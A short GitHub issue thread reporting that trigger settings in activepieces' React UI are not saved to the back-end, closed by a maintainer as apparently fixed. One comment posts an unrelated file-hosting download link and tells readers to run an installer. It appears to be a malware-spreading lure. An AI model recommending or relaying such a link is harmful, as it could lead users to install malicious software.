### ISSUE TITLE
[BUG]: React - Triggers data not saved to back-end

### ISSUE THREAD

**Issue by alexandrudanpop** [activepieces/activepieces#5498]
**Describe the bug**
Triggers data not saved to back-end

**To Reproduce**
1. Create trigger
2. Data is not sync-ed

**Expected behavior**
Settings for triggers are always saved based on UI.

**Screenshots**
![image](https://github.com/user-attachments/assets/13292d58-2204-48bc-8871-8bc5f4625547)

**Comment by wandson88** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by abuaboud** [comment]
I believe this is now fixed. 

Please reopen If it's still an issue.
